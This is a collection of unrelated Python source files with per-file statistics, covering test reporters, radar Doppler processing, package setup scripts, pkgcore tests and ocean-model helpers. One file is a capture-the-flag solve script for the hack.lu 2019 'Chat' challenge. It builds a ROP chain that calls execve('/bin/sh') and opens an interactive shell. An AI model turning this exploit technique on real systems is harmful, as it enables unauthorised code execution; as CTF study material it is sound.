def test_case_complete(self, result):
self.log_file.write(json.dumps(result))
self.log_file.write("\n")
self._reset_logging()
def report(self):
self.log_file.write("RUN COMPLETE\n")
self.log_file.close()
return True
# Hooks for plugin system
def add_command_line_options(parser):
parser.add_option(
"--test-case-results",
action="store",
dest="test_case_json_results",
type="string",
default=None,
help="Store test results in json format",
)
def build_test_reporters(options):
if options.test_case_json_results:
return [TestCaseJSONReporter(options)]
else:
return []
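# Usage sketch (assuming testify loads this module as a plugin; the option
# below is the one registered in add_command_line_options):
#
#   testify my.test.module --test-case-results /tmp/results.json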
| 29.230769 | 74 | 0.68 | 255 | 1,900 | 4.905882 | 0.509804 | 0.044764 | 0.043965 | 0.045564 | 0.076739 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005472 | 0.230526 | 1,900 | 64 | 75 | 29.6875 | 0.850205 | 0.343684 | 0 | 0.057143 | 0 | 0 | 0.082994 | 0.017901 | 0 | 0 | 0 | 0 | 0 | 1 | 0.171429 | false | 0 | 0.085714 | 0 | 0.371429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
653c1ca178e3a7217e7cc91b5cf8a256c13671ea | 5,458 | py | Python | components/mroipac/doppler/Doppler.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 1,133 | 2022-01-07T21:24:57.000Z | 2022-01-07T21:33:08.000Z | components/mroipac/doppler/Doppler.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 276 | 2019-02-10T07:18:28.000Z | 2022-03-31T21:45:55.000Z | components/mroipac/doppler/Doppler.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 235 | 2019-02-10T05:00:53.000Z | 2022-03-18T07:37:24.000Z | #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Copyright 2010 California Institute of Technology. ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# United States Government Sponsorship acknowledged. This software is subject to
# U.S. export control laws and regulations and has been classified as 'EAR99 NLR'
# (No [Export] License Required except when exporting to an embargoed country,
# end user, or in support of a prohibited end use). By downloading this software,
# the user agrees to comply with all applicable U.S. export laws and regulations.
# The user has the responsibility to obtain export licenses, or other export
# authority as may be required before exporting this software to any 'EAR99'
# embargoed foreign country or citizen of those countries.
#
# Author: Walter Szeliga
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
import isceobj
from iscesys.Component.Component import Component, Port
from mroipac.doppler import doppler
class Doppler(Component):
def __init__(self):
super(Doppler, self).__init__()
self.slcImage = ''
self.slcFilename = ''
self.lines = None
self.startLine = 1
self.samples = None
self.dim1_r_fd = None
self.r_fd = []
self.createPorts()
self.dictionaryOfVariables = {
'WIDTH': ['self.samples','int','mandatory'],
'YMIN': ['self.startLine','int','mandatory'],
            'FILE_LENGTH': ['self.lines','int','mandatory']}
self.dictionaryOfOutputVariables= {'R_FD': 'self.r_fd'}
self.descriptionOfVariables = {}
return None
def createPorts(self):
# Create Input Ports
framePort = Port(name='frame',method=self.addFrame)
instrumentPort = Port(name='instrument',method=self.addInstrument)
imagePort = Port(name='image',method=self.addImage)
self._inputPorts.add(framePort)
self._inputPorts.add(imagePort)
self._inputPorts.add(instrumentPort)
return None
def addFrame(self):
frame = self._inputPorts.getPort(name='frame').getObject()
if (frame):
try:
self.samples = frame.getNumberOfSamples()
self.lines = frame.getNumberOfLines()
except AttributeError:
print( "Object %s requires getNumberOfSamples() and getNumberOfLines() methods" % frame.__class__)
def addImage(self):
image = self._inputPorts.getPort(name='image').getObject()
if (image):
try:
self.slcFilename = image.getFilename()
except AttributeError:
print ("Object %s requires a getFilename() methods" % image.__class__)
def addInstrument(self):
pass
def setSLCfilename(self,filename):
self.slcFilename = filename
def setSamples(self,length):
self.samples = int(length)
def setLines(self,lines):
self.lines = int(lines)
def setStartLine(self,start):
if (start < 1):
raise ValueError("START_LINE must be greater than 0")
self.startLine = int(start)
def getDoppler(self):
return self.r_fd
def calculateDoppler(self,slcImage=None):
for port in self._inputPorts:
method = port.getMethod()
method()
slcCreatedHere = False
if (slcImage == None):
slcImage = self.createSlcImage()
            slcCreatedHere = True
slcImagePt= slcImage.getImagePointer()
self.setState()
self.allocateArrays()
doppler.doppler_Py(slcImagePt)
self.getState()
self.deallocateArrays()
if(slcCreatedHere):
slcImage.finalizeImage()
def createSlcImage(self):
# Check file name
width = self.samples
from isceobj.Image.SlcImage import SlcImage
objRaw = SlcImage()
objRaw.initImage(self.slcFilename,'read','l',width)
objRaw.createImage()
return objRaw
def setState(self):
# Set up the stuff needed for doppler
doppler.setLines_Py(self.lines)
doppler.setSamples_Py(self.samples)
doppler.setStartLine_Py(self.startLine)
self.dim1_r_fd = int(self.samples)
def getState(self):
self.r_fd = doppler.get_r_fd_Py(self.dim1_r_fd)
def allocateArrays(self):
if (self.dim1_r_fd == None):
self.dim1_r_fd = len(self.r_fd)
if (not self.dim1_r_fd):
print("Error. Trying to allocate zero size array")
raise Exception
doppler.allocate_r_fd_Py(self.dim1_r_fd)
def deallocateArrays(self):
doppler.deallocate_r_fd_Py()
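# Minimal driver sketch (hypothetical values; normal ISCE use wires the frame
# and image objects in through the component ports instead of these setters):
#
#   dop = Doppler()
#   dop.setSLCfilename('scene.slc')
#   dop.setSamples(5000)
#   dop.setLines(30000)
#   dop.calculateDoppler()
#   r_fd = dop.getDoppler()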
| 36.145695 | 114 | 0.608465 | 593 | 5,458 | 5.504216 | 0.367622 | 0.014706 | 0.019301 | 0.023591 | 0.051164 | 0.047794 | 0.011642 | 0.011642 | 0 | 0 | 0 | 0.005568 | 0.276108 | 5,458 | 150 | 115 | 36.386667 | 0.820552 | 0.265482 | 0 | 0.061856 | 0 | 0 | 0.082075 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.164948 | false | 0.010309 | 0.041237 | 0.010309 | 0.257732 | 0.030928 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
653ebac9b608378bd958fc8eb802635c6758f75e | 1,167 | py | Python | setup.py | jackeylu/sentry-wechat | 66dcbbd88f4a3a77a40e45f76d95b4f5f4ef769a | [
"MIT"
] | 15 | 2020-09-08T18:10:17.000Z | 2022-01-20T02:42:27.000Z | setup.py | jackeylu/sentry-wechat | 66dcbbd88f4a3a77a40e45f76d95b4f5f4ef769a | [
"MIT"
] | 2 | 2020-07-16T23:16:00.000Z | 2021-04-14T10:54:23.000Z | setup.py | jackeylu/sentry-wechat | 66dcbbd88f4a3a77a40e45f76d95b4f5f4ef769a | [
"MIT"
] | 5 | 2020-06-09T04:14:49.000Z | 2021-06-01T11:17:27.000Z | #!/usr/bin/env python
# coding: utf-8
#############################################
# File Name: setup.py
# Author: whzcorcd
# Mail: whzcorcd@gmail.com
# Created Time: 2020-06-08
#############################################
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="sentry-wechat",
version='0.0.3',
author='whzcorcd',
author_email='whzcorcd@gmail.com',
url='https://github.com/corcd/sentry-wechat',
description='A sentry extension which share information to Wechat Work',
long_description=long_description,
long_description_content_type="text/markdown",
license='MIT',
keywords='sentry wechat',
include_package_data=True,
zip_safe=False,
package_dir={'': 'src'},
packages=find_packages('src'),
install_requires=[
'sentry>=9.0.0',
'requests',
],
entry_points={
'sentry.plugins': [
'sentry_wechat = sentry_wechat.plugin:WechatPlugin'
]
},
classifiers=[
'Programming Language :: Python :: 2.7',
"License :: OSI Approved :: MIT License",
]
)
| 25.933333 | 76 | 0.588689 | 128 | 1,167 | 5.234375 | 0.664063 | 0.089552 | 0.047761 | 0.089552 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01826 | 0.202228 | 1,167 | 44 | 77 | 26.522727 | 0.701396 | 0.104542 | 0 | 0 | 0 | 0 | 0.361433 | 0.034773 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.03125 | 0 | 0.03125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
653ed37735f577d573c1f58e54291ad3d11818c5 | 1,236 | py | Python | Gathered CTF writeups/ptr-yudai-writeups/2019/hacklu_CTF_2019/Chat/solve.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | 1 | 2022-03-27T06:00:41.000Z | 2022-03-27T06:00:41.000Z | Gathered CTF writeups/ptr-yudai-writeups/2019/hacklu_CTF_2019/Chat/solve.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | null | null | null | Gathered CTF writeups/ptr-yudai-writeups/2019/hacklu_CTF_2019/Chat/solve.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | 1 | 2022-03-27T06:01:42.000Z | 2022-03-27T06:01:42.000Z | from ptrlib import *
def nc():
sock.sendlineafter("> ", "/nc")
sock.recvuntil("Channel ")
return int(sock.recvline()[:-1])
def echo(size, data):
sock.sendlineafter("> ", "/e")
sock.sendline(str(size))
sock.sendline(data)
return
def pc():
sock.sendlineafter("> ", "/pc")
return
def qc():
sock.sendlineafter("> ", "/qc")
return
def jc(cid):
sock.sendlineafter("> ", "/jc {}".format(cid))
elf = ELF("./chat")
sock = Socket("localhost", 9999)
#sock = Socket("chat.forfuture.fluxfingers.net", 1337)
rop_pop_eax = 0x08051cf6
rop_pop_ebx = 0x0804901e
rop_int80 = 0x0807d3d0
# channel 1
nc()
pc()
# channel 2
nc()
pc()
# ROP
envp = 0x8048000 + next(elf.find("\0"*4))
payload = b''
payload += flat([
p32(0xdeadbeef),
p32(elf.symbol("command") + 0x14),
p32(elf.symbol("command") + 0x10),
p32(rop_pop_ebx),
p32(elf.symbol("command") + 0x8),
p32(rop_pop_eax),
p32(11),
p32(rop_int80)
])
assert b'\n' not in payload
assert b'\r' not in payload
jc(1)
# 0x3d090 - 0xa30
echo(250000, payload)
qc()
payload = b"/jc 2\0\0\0"
payload += b"/bin/sh\0"
payload += p32(elf.symbol("command") + 8)
payload += p32(0)
sock.sendlineafter("> ", payload)
sock.interactive()
| 18.447761 | 54 | 0.618123 | 172 | 1,236 | 4.383721 | 0.412791 | 0.135279 | 0.06366 | 0.100796 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.099108 | 0.183657 | 1,236 | 66 | 55 | 18.727273 | 0.648167 | 0.075243 | 0 | 0.14 | 0 | 0 | 0.093146 | 0 | 0 | 0 | 0.052724 | 0 | 0.04 | 1 | 0.1 | false | 0 | 0.02 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6542b0b0b0b176befff7ce8478620d35eddee986 | 8,038 | py | Python | pkgcore/test/scripts/test_pmaint.py | pombreda/pkgcore | b438fc573af1a031d7ce12adbbf299bab5338451 | [
"BSD-3-Clause"
] | 1 | 2021-07-05T13:10:18.000Z | 2021-07-05T13:10:18.000Z | pkgcore/test/scripts/test_pmaint.py | vapier/pkgcore | 35a7e4f4f0fc61dd9c4dc72d35a57e2e9d5b832f | [
"BSD-3-Clause"
] | 8 | 2015-03-24T14:21:44.000Z | 2015-03-24T14:21:44.000Z | pkgcore/test/scripts/test_pmaint.py | vapier/pkgcore | 35a7e4f4f0fc61dd9c4dc72d35a57e2e9d5b832f | [
"BSD-3-Clause"
] | null | null | null | # Copyright: 2006-2011 Brian Harring <ferringb@gmail.com>
# Copyright: 2006 Marien Zwart <marienz@gentoo.org>: BSD/GPL2
# License: BSD/GPL2
from functools import partial
from snakeoil import compatibility
from snakeoil.formatters import PlainTextFormatter
from snakeoil.mappings import AttrAccessible
from pkgcore.config import basics, ConfigHint, configurable
from pkgcore.ebuild.cpv import CPV
from pkgcore.operations.repo import install, uninstall, replace, operations
from pkgcore.repository import util, syncable
from pkgcore.scripts import pmaint
from pkgcore.sync import base
from pkgcore.test import TestCase
from pkgcore.test.scripts import helpers
if compatibility.is_py3k:
from io import BytesIO
else:
from StringIO import StringIO as BytesIO
Options = AttrAccessible
class FakeSyncer(base.syncer):
def __init__(self, *args, **kwargs):
self.succeed = kwargs.pop('succeed', True)
base.syncer.__init__(self, *args, **kwargs)
self.synced = False
def _sync(self, verbosity, output_fd, **kwds):
self.synced = True
return self.succeed
class SyncableRepo(syncable.tree, util.SimpleTree):
pkgcore_config_type = ConfigHint(typename='raw_repo')
def __init__(self, succeed=True):
util.SimpleTree.__init__(self, {})
syncer = FakeSyncer('/fake', 'fake', succeed=succeed)
syncable.tree.__init__(self, syncer)
success_section = basics.HardCodedConfigSection({'class': SyncableRepo,
'succeed': True})
failure_section = basics.HardCodedConfigSection({'class': SyncableRepo,
'succeed': False})
class TestSync(TestCase, helpers.ArgParseMixin):
_argparser = pmaint.sync
def test_parser(self):
values = self.parse(repo=success_section)
self.assertEqual(['repo'], [x[0] for x in values.repos])
values = self.parse('repo', repo=success_section)
self.assertEqual(['repo'], [x[0] for x in values.repos])
def test_sync(self):
config = self.assertOut(
[
"*** syncing 'myrepo'...",
"*** synced 'myrepo'",
],
myrepo=success_section)
self.assertTrue(config.raw_repo['myrepo']._syncer.synced)
self.assertOut(
[
"*** syncing 'myrepo'...",
"*** failed syncing 'myrepo'",
],
myrepo=failure_section)
self.assertOutAndErr(
[
"*** syncing 'goodrepo'...",
"*** synced 'goodrepo'",
"*** syncing 'badrepo'...",
"*** failed syncing 'badrepo'",
"*** synced 'goodrepo'",
], [
"!!! failed sync'ing 'badrepo'",
],
'goodrepo', 'badrepo',
goodrepo=success_section, badrepo=failure_section)
class fake_pkg(CPV):
def __init__(self, repo, *a, **kw):
CPV.__init__(self, *a, **kw)
object.__setattr__(self, 'repo', repo)
def derive_op(name, op, *a, **kw):
    if isinstance(name, str):
name = [name]
name = ['finalize_data'] + list(name)
class new_op(op):
def f(*a, **kw):
return True
for x in name:
locals()[x] = f
del f, x
return new_op(*a, **kw)
class fake_operations(operations):
def _cmd_implementation_install(self, pkg, observer):
self.repo.installed.append(pkg)
return derive_op('add_data', install, self.repo, pkg, observer)
def _cmd_implementation_uninstall(self, pkg, observer):
self.repo.uninstalled.append(pkg)
return derive_op('remove_data', uninstall, self.repo, pkg, observer)
def _cmd_implementation_replace(self, oldpkg, newpkg, observer):
self.repo.replaced.append((oldpkg, newpkg))
return derive_op(('add_data', 'remove_data'),
replace, self.repo, oldpkg, newpkg, observer)
class fake_repo(util.SimpleTree):
operations_kls = fake_operations
def __init__(self, data, frozen=False, livefs=False):
self.installed = []
self.replaced = []
self.uninstalled = []
util.SimpleTree.__init__(self, data,
pkg_klass=partial(fake_pkg, self))
self.livefs = livefs
self.frozen = frozen
def make_repo_config(repo_data, livefs=False, frozen=False):
def repo():
return fake_repo(repo_data, livefs=livefs, frozen=frozen)
repo.pkgcore_config_type = ConfigHint(typename='repo')
return basics.HardCodedConfigSection({'class':repo})
class TestCopy(TestCase, helpers.ArgParseMixin):
_argparser = pmaint.copy
def execute_main(self, *a, **kw):
config = self.parse(*a, **kw)
out = PlainTextFormatter(BytesIO())
ret = config.main_func(config, out, out)
return ret, config, out
def test_normal_function(self):
ret, config, out = self.execute_main(
'trg', '--source-repo', 'src',
'*',
src=make_repo_config({'sys-apps':{'portage':['2.1', '2.3']}}),
trg=make_repo_config({})
)
        self.assertEqual(ret, 0, "expected zero exit code")
        self.assertEqual(list(map(str, config.target_repo.installed)),
            ['sys-apps/portage-2.1', 'sys-apps/portage-2.3'])
self.assertEqual(config.target_repo.uninstalled,
config.target_repo.replaced,
msg="uninstalled should be the same as replaced; empty")
d = {'sys-apps':{'portage':['2.1', '2.2']}}
ret, config, out = self.execute_main(
'trg', '--source-repo', 'src',
'=sys-apps/portage-2.1',
src=make_repo_config(d),
trg=make_repo_config(d)
)
        self.assertEqual(ret, 0, "expected zero exit code")
        self.assertEqual([list(map(str, x)) for x in config.target_repo.replaced],
            [['sys-apps/portage-2.1', 'sys-apps/portage-2.1']])
self.assertEqual(config.target_repo.uninstalled,
config.target_repo.installed,
msg="installed should be the same as uninstalled; empty")
def test_ignore_existing(self):
ret, config, out = self.execute_main(
'trg', '--source-repo', 'src',
'*', '--ignore-existing',
src=make_repo_config({'sys-apps':{'portage':['2.1', '2.3']}}),
trg=make_repo_config({})
)
        self.assertEqual(ret, 0, "expected zero exit code")
        self.assertEqual(list(map(str, config.target_repo.installed)),
            ['sys-apps/portage-2.1', 'sys-apps/portage-2.3'])
self.assertEqual(config.target_repo.uninstalled,
config.target_repo.replaced,
msg="uninstalled should be the same as replaced; empty")
ret, config, out = self.execute_main(
'trg', '--source-repo', 'src',
'*', '--ignore-existing',
src=make_repo_config({'sys-apps':{'portage':['2.1', '2.3']}}),
trg=make_repo_config({'sys-apps':{'portage':['2.1']}})
)
        self.assertEqual(ret, 0, "expected zero exit code")
        self.assertEqual(list(map(str, config.target_repo.installed)),
            ['sys-apps/portage-2.3'])
self.assertEqual(config.target_repo.uninstalled,
config.target_repo.replaced,
msg="uninstalled should be the same as replaced; empty")
class TestRegen(TestCase, helpers.ArgParseMixin):
_argparser = pmaint.regen
def test_parser(self):
class TestSimpleTree(util.SimpleTree):
pass
@configurable(typename='repo')
def fake_repo():
return TestSimpleTree({})
options = self.parse(
'spork', '--threads', '2', spork=basics.HardCodedConfigSection(
{'class': fake_repo}))
self.assertEqual(
[options.repo.__class__, options.threads],
[TestSimpleTree, 2])
| 33.773109 | 78 | 0.59903 | 892 | 8,038 | 5.241031 | 0.202915 | 0.048128 | 0.03893 | 0.041711 | 0.412406 | 0.327701 | 0.298824 | 0.281925 | 0.278503 | 0.259465 | 0 | 0.009697 | 0.268724 | 8,038 | 237 | 79 | 33.915612 | 0.785641 | 0.016546 | 0 | 0.248619 | 0 | 0 | 0.137957 | 0.002658 | 0 | 0 | 0 | 0 | 0.104972 | 1 | 0.104972 | false | 0.005525 | 0.077348 | 0.016575 | 0.320442 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
65461d78a306d8b0f5ea1ccbe0dc3a344e60948d | 1,093 | py | Python | setup.py | luciancooper/bbcmd | 307aea02d245b3d217bb1a7f76a985b98da54e40 | [
"MIT"
] | 2 | 2018-12-07T20:13:03.000Z | 2020-06-03T11:34:59.000Z | setup.py | luciancooper/bbcmd | 307aea02d245b3d217bb1a7f76a985b98da54e40 | [
"MIT"
] | null | null | null | setup.py | luciancooper/bbcmd | 307aea02d245b3d217bb1a7f76a985b98da54e40 | [
"MIT"
] | null | null | null | from setuptools import setup,find_packages
with open("README.md", "r") as f:
long_description = f.read()
setup(
name='bbcmd',
version='1.2',
author='Lucian Cooper',
url='https://github.com/luciancooper/bbcmd',
description='Baseball Statistics Simulator',
long_description=long_description,
long_description_content_type="text/markdown",
keywords='baseball statistics sabermetrics',
license='MIT',
classifiers=[
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3.6',
'Operating System :: MacOS',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX :: Linux',
],
packages=find_packages(),
install_requires=['cmdprogress','numpy','pandas','beautifulsoup4'],
entry_points={
'console_scripts': [
'bbsim = bbsim.__main__:main',
'bbscrape = bbscrape.__main__:main',
]
},
)
| 31.228571 | 71 | 0.628545 | 105 | 1,093 | 6.361905 | 0.695238 | 0.08982 | 0.056886 | 0.08982 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005959 | 0.232388 | 1,093 | 34 | 72 | 32.147059 | 0.790226 | 0 | 0 | 0 | 0 | 0 | 0.483074 | 0.020128 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.03125 | 0 | 0.03125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
654826f05190445e1a9ed6939d66acea1e8e5bbc | 2,528 | py | Python | data/nemo.py | dkllrjr/PyKeller | 6788876a0ab273c19e1643d7bce637f6e700eb99 | [
"MIT"
] | null | null | null | data/nemo.py | dkllrjr/PyKeller | 6788876a0ab273c19e1643d7bce637f6e700eb99 | [
"MIT"
] | null | null | null | data/nemo.py | dkllrjr/PyKeller | 6788876a0ab273c19e1643d7bce637f6e700eb99 | [
"MIT"
] | null | null | null | ##############################################################################
# Python3
# laplace
# Tue Mar 3 12:14:20 2020
##############################################################################
import numpy as np
import PyKeller.data.model as PKdm
def lat_lon2nparray(xrvar):
lat = np.array(xrvar.nav_lat)
lon = np.array(xrvar.nav_lon)
lat_lon = []
for i in range(lat.shape[0]):
for j in range(lat.shape[1]):
lat_lon.append([lat[i,j],lon[i,j]])
lat_lon_np = np.array(lat_lon)
lat_lon_np = lat_lon_np.reshape(lat.shape[0],lat.shape[1],2)
return lat_lon_np
def find_loc(var,loc):
# loc needs to be a list of lists => [[lat,lon],[lat,lon]]
lat = np.array(var.nav_lat)
lon = np.array(var.nav_lon)
lat_lon = []
for i in range(lat.shape[0]):
for j in range(lat.shape[1]):
lat_lon.append([lat[i,j],lon[i,j]])
ind_loc = []
for i in range(len(loc)):
ind_loc.append(PKdm.lat_lon_near_angle(lat_lon,loc[i]))
lat_lon_np = np.array(lat_lon)
lat_lon_np = lat_lon_np.reshape(lat.shape[0],lat.shape[1],2)
ind_loc_np = np.array(ind_loc)
ind_loc_np = ind_loc_np.reshape(len(loc),2)
ind = []
for k in range(ind_loc_np.shape[0]):
for i in range(lat_lon_np.shape[0]):
for j in range(lat_lon_np.shape[1]):
if tuple(lat_lon_np[i,j]) == tuple(ind_loc_np[k]):
ind.append([i,j])
ind = np.array(ind)
return ind
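# Usage sketch (hypothetical xarray dataset `ds` exposing nav_lat/nav_lon):
#
#   ind = find_loc(ds, [[43.5, 7.0], [44.0, 8.5]])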
def find_loc_SI(SI,loc):
# loc needs to be a list of lists => [[lat,lon],[lat,lon]]
lat = SI['latitude']
lon = SI['longitude']
date = SI['date']
i = 0
ind_date = [0]
while i < len(date) - 1:
if date[i] < date[i+1]:
ind_date.append(i+1)
i += 1
ind_date.append(i+1)
lat_lon = []
for i in range(len(lat)):
lat_lon.append([lat[i],lon[i]])
ind_loc = []
for i in range(len(loc)):
ind_loc.append(PKdm.lat_lon_near_angle(lat_lon,loc[i]))
# return ind_loc,ind_date
ind = []
for i in range(len(ind_loc)):
ind.append([])
for j in range(len(ind_loc[i])):
for k in range(ind_date[j],ind_date[j+1]):
# print(tuple(lat_lon[k]),tuple(ind_loc[i][j]))
if tuple(lat_lon[k]) == tuple(ind_loc[i][j]):
ind[i].append(k)
ind[i] = np.array(ind[i])
return ind | 27.78022 | 78 | 0.511076 | 403 | 2,528 | 3.027295 | 0.146402 | 0.147541 | 0.078689 | 0.063115 | 0.615574 | 0.518033 | 0.483607 | 0.439344 | 0.439344 | 0.398361 | 0 | 0.019294 | 0.282437 | 2,528 | 91 | 79 | 27.78022 | 0.653252 | 0.095728 | 0 | 0.416667 | 0 | 0 | 0.009892 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0.033333 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6548a1ba90f575f025ae972016cf84eed6574920 | 6,465 | py | Python | generate/generate_data_augmentation_zones.py | prise-3d/Thesis-DataAugmentation | 58e7fa9f4a6bf3e2e3cee56d827fabd7190bcc84 | [
"MIT"
] | null | null | null | generate/generate_data_augmentation_zones.py | prise-3d/Thesis-DataAugmentation | 58e7fa9f4a6bf3e2e3cee56d827fabd7190bcc84 | [
"MIT"
] | null | null | null | generate/generate_data_augmentation_zones.py | prise-3d/Thesis-DataAugmentation | 58e7fa9f4a6bf3e2e3cee56d827fabd7190bcc84 | [
"MIT"
] | null | null | null | # main imports
import os, sys
import argparse
import pickle
import random
import numpy as np
import math
# image processing imports
from PIL import Image
from ipfml.processing import transform, segmentation
from ipfml import utils
# modules imports
sys.path.insert(0, '') # trick to enable import of main folder module
import custom_config as cfg
from modules.utils import data as dt
import utils as utils_functions
# getting configuration information
zone_folder = cfg.zone_folder
min_max_filename = cfg.min_max_filename_extension
# define all scenes values
scenes_list = cfg.scenes_names
scenes_indexes = cfg.scenes_indices
path = cfg.dataset_path
zones = cfg.zones_indices
seuil_expe_filename = cfg.seuil_expe_filename
output_data_folder = cfg.output_data_folder
image_scene_size = cfg.image_scene_size
image_zone_size = cfg.image_zone_size
possible_point_zone = cfg.possible_point_zone
def main():
parser = argparse.ArgumentParser(description="Compute and prepare data augmentation of scenes")
parser.add_argument('--data', type=str, help="object filename saved using pickle", required=True)
parser.add_argument('--scene', type=str, help="scene name to display click information", required=True, choices=cfg.scenes_names)
    parser.add_argument('--n', type=int, help="number of clicks desired per zone")
    parser.add_argument('--images', type=int, help="number of images (with estimated thresholds) desired per scene")
parser.add_argument('--output', type=str, help="output file with new thresholds data")
args = parser.parse_args()
p_data = args.data
p_scene = args.scene
p_n = args.n
p_images = args.images
p_output = args.output
# load data extracted by zones
fileObject = open(p_data, 'rb')
scenes_data = pickle.load(fileObject)
# get clicks data of specific scene
scene_data = scenes_data[p_scene]
    # getting image zone size and useful information
zone_width, zone_height = image_zone_size
scene_width, scene_height = image_scene_size
nb_x_parts = math.floor(scene_width / zone_width)
# get scenes list
scenes = os.listdir(path)
# remove min max file from scenes folder
scenes = [s for s in scenes if min_max_filename not in s]
# go ahead each scenes in order to get threshold
for folder_scene in scenes:
scene_path = os.path.join(path, folder_scene)
# construct each zones folder name
zones_folder = []
zones_threshold = []
# get zones list info
for index in zones:
index_str = str(index)
if len(index_str) < 2:
index_str = "0" + index_str
current_zone = "zone"+index_str
zones_folder.append(current_zone)
zone_path = os.path.join(scene_path, current_zone)
with open(os.path.join(zone_path, seuil_expe_filename)) as f:
zones_threshold.append(int(f.readline()))
# generate a certain number of images
for i in range(p_images):
###########################################
# Compute weighted threshold if necessary #
###########################################
##############################
# 1. Get random point from possible position
##############################
possible_x, possible_y = possible_point_zone
p_x, p_y = (random.randrange(possible_x), random.randrange(possible_y))
##############################
# 2. Get zone indices of this point (or only one zone if `%` 200)
##############################
# coordinate of specific zone, hence use threshold of zone
if p_x % zone_width == 0 and p_y % zone_height == 0:
zone_index = utils_functions.get_zone_index(p_x, p_y)
final_threshold = int(zones_threshold[zone_index])
else:
# get zone identifiers of this new zones (from endpoints)
p_top_left = (p_x, p_y)
p_top_right = (p_x + zone_width, p_y)
p_bottom_right = (p_x + zone_width, p_y + zone_height)
p_bottom_left = (p_x, p_y + zone_height)
points = [p_top_left, p_top_right, p_bottom_right, p_bottom_left]
p_zones_indices = []
# for each points get threshold information
for p in points:
x, y = p
zone_index = utils_functions.get_zone_index(x, y)
p_zones_indices.append(zone_index)
# 2.3. Compute area of intersected zones (and weights)
# get proportions of pixels of img into each zone
overlaps = []
p_x_max = p_x + zone_width
p_y_max = p_y + zone_height
for index, zone_index in enumerate(p_zones_indices):
x_zone = (zone_index % nb_x_parts) * zone_width
y_zone = (math.floor(zone_index / nb_x_parts)) * zone_height
x_max_zone = x_zone + zone_width
y_max_zone = y_zone + zone_height
# computation of overlap
# x_overlap = max(0, min(rect1.right, rect2.right) - max(rect1.left, rect2.left))
